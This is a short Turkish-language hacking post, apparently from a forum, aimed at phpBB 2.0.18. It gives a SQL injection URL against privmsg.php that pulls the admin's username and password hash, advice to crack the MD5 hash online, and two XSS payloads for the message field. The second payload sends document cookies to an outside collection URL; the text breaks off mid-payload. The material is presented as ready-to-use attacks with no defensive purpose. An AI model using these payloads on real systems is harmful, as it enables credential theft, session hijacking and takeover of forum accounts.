phpbb 2.0.18
SQL
/privmsg.php?folder=savebox&mod e=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION
SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,username,0,0,0,0,0,0 ,0,0,0,user_password
FROM phpbb_users WHERE user_id=2 LIMIT 1/*
burada adminin passwordu çıkar peki kimin idlere bakın 1,2 . ler admindir ona göre bu md5 hashı kimindir öğrenebilirsiniz.
Peki bu md5 hashları nasıl kıracağız?
Online md5 cracker başlığına bakın .
XSS(XSS başlığına bakmanızı tavsiye ederim)
Mesaj kısmına <B C=">" onmouseover="alert('XXX)" X="<B "> H E L O </B> yazın.
cookie çalma vs. yapabilirsiniz.Çok komutu var daha.
XSS 2
Yine aşağıdaki kodu mesaj kısmına yazıyoruz
<B C=">" ''style='font-size:0;color:#EFEFEF'style='to p:expression(eval(this.sss));' sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document